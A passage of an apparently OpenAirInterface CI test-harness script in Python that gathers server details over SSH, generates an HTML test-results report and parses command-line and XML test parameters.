UserName = self.eNBUserName
Password = self.eNBPassword
else:
return -1
if machine == 'UE':
if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
else:
return -1
self.open(IPAddress, UserName, Password)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.OsVersion = result.group('os_type')
logging.debug('OS is: ' + self.OsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.KernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.KernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.UhdVersion)
self.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 15)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.UsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.UsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.CpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.CpuNb)
self.CpuModel = result.group('model')
logging.debug('model: ' + self.CpuModel)
self.CpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.CpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
if (not self.htmlHeaderCreated):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML header \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.ranRepository + '">' + self.ranRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.ranBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.ranCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
if self.ranAllowMerge != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.ranCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.ranTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.ranTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
if (self.ADBIPAddress != 'none'):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' OAI UE(s) is(are) connected to CI bench</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += '__STATE_' + self.htmlTabNames[count] + '__'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Relative Time (ms)</th>\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=3>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFile.close()
time.sleep(1)
if passStatus:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__//' test_results.html"
subprocess.run(cmd, shell=True)
else:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__/<span class=\"glyphicon glyphicon-remove\"><\/span>/' test_results.html"
subprocess.run(cmd, shell=True)
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML footer \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
machines = [ 'eNB', 'UE' ]
for machine in machines:
res = self.RetrieveSystemVersion(machine)
if res == -1:
continue
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>' + str(machine) + ' Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.OsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.KernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus, machine='eNB'):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
currentTime = int(round(time.time() * 1000)) - self.startTime
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + format(currentTime / 1000, '.1f') + '</td>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == OAI_UE_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - OAI UE process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION) or (processesStatus == OAI_UE_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE) or (processesStatus == OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK?</td>\n')
elif (processesStatus == ENB_PROCESS_SLAVE_RRU_NOT_SYNCED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' Slave RRU could not synch</td>\n')
elif (processesStatus == OAI_UE_PROCESS_COULD_NOT_SYNC):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - UE could not sync</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
elif (len(str(self.htmlUEFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Could not copy UE logfile|oaitun_ue1 interface is either NOT mounted or NOT configured', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmlUEFailureMsg + '</pre></td>\n')
self.htmlUEFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
currentTime = int(round(time.time() * 1000)) - self.startTime
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + format(currentTime / 1000, '.1f') + '</td>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('----------------------------------------------------------------------------------------------------------------------')
print('main.py Ver:' + Version)
print('----------------------------------------------------------------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
print(' TerminateeNB, TerminateUE, TerminateHSS, TerminateMME, TerminateSPGW')
print(' LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf')
print('---------------------------------------------------------------------------------------------------- Git Options --')
print(' --ranRepository=[OAI RAN Repository URL]')
print(' --ranBranch=[OAI RAN Repository Branch]')
print(' --ranCommitID=[OAI RAN Repository Commit SHA-1]')
print(' --ranAllowMerge=[Allow Merge Request (with target branch) (true or false)]')
print(' --ranTargetBranch=[Target Branch in case of a Merge Request]')
print('--------------------------------------------------------------------------------------------- eNB Server Options --')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print('------------------------------------------------------------------------------------------ OAI UE Server Options --')
print(' --UEIPAddress=[UE\'s IP Address]')
print(' --UEUserName=[UE\'s Login User Name]')
print(' --UEPassword=[UE\'s Login Password]')
print(' --UESourceCodePath=[UE\'s Source Code Path]')
print('--------------------------------------------------------------------------------------------- EPC Server Options --')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox or OAI-Rel14-CUPS]')
print('--------------------------------------------------------------------------------------------- ABD Server Options --')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print('----------------------------------------------------------------------------------------------------------------------')
print(' --XMLTestFile=[XML Test File to be run]')
print('----------------------------------------------------------------------------------------------------------------------')
def CheckClassValidity(action,id):
if action != 'Build_eNB' and action != 'WaitEndBuild_eNB' and action != 'Initialize_eNB' and action != 'Terminate_eNB' and action != 'Initialize_UE' and action != 'Terminate_UE' and action != 'Attach_UE' and action != 'Detach_UE' and action != 'Build_OAI_UE' and action != 'Initialize_OAI_UE' and action != 'Terminate_OAI_UE' and action != 'DataDisable_UE' and action != 'DataEnable_UE' and action != 'CheckStatusUE' and action != 'Ping' and action != 'Iperf' and action != 'Reboot_UE' and action != 'Initialize_FlexranCtrl' and action != 'Terminate_FlexranCtrl' and action != 'Initialize_HSS' and action != 'Terminate_HSS' and action != 'Initialize_MME' and action != 'Terminate_MME' and action != 'Initialize_SPGW' and action != 'Terminate_SPGW' and action != 'Initialize_CatM_module' and action != 'Terminate_CatM_module' and action != 'Attach_CatM_module' and action != 'Detach_CatM_module' and action != 'Ping_CatM_module' and action != 'IdleSleep' and action != 'Perform_X2_Handover':
logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
return False
return True
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
xmlBgBuildField = test.findtext('backgroundBuild')
if (xmlBgBuildField is None):
SSH.backgroundBuild = False
else:
if re.match('true', xmlBgBuildField, re.IGNORECASE):
SSH.backgroundBuild = True
else:
SSH.backgroundBuild = False
if action == 'WaitEndBuild_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'CheckStatusUE':
expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
if (expectedNBUE is None):
SSH.expectedNbOfConnectedUEs = -1
else:
SSH.expectedNbOfConnectedUEs = int(expectedNBUE)
if action == 'Build_OAI_UE':
SSH.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
if action == 'Initialize_OAI_UE':
SSH.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Terminate_OAI_UE':
SSH.eNB_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
SSH.iperf_options = test.findtext('iperf_options')
if (SSH.iperf_options is None):
SSH.iperf_options = 'check'
else:
if SSH.iperf_options != 'check' and SSH.iperf_options != 'sink':
logging.debug('ERROR: test-case has wrong option ' + SSH.iperf_options)
SSH.iperf_options = 'check'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
if action == 'Perform_X2_Handover':
string_field = test.findtext('x2_ho_options')
if (string_field is None):
SSH.x2_ho_options = 'network'
else:
if string_field != 'network':
logging.error('ERROR: test-case has wrong option ' + string_field)
SSH.x2_ho_options = 'network'
else:
SSH.x2_ho_options = string_field
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
cwd = os.getcwd()
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
elif re.match('^\-\-eNBRepository=(.+)$|^\-\-ranRepository(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.ranRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$|^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.ranAllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$|^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.ranBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$|^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.ranCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$|^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.ranTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$|^\-\-eNB[1-2]IPAddress=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE):
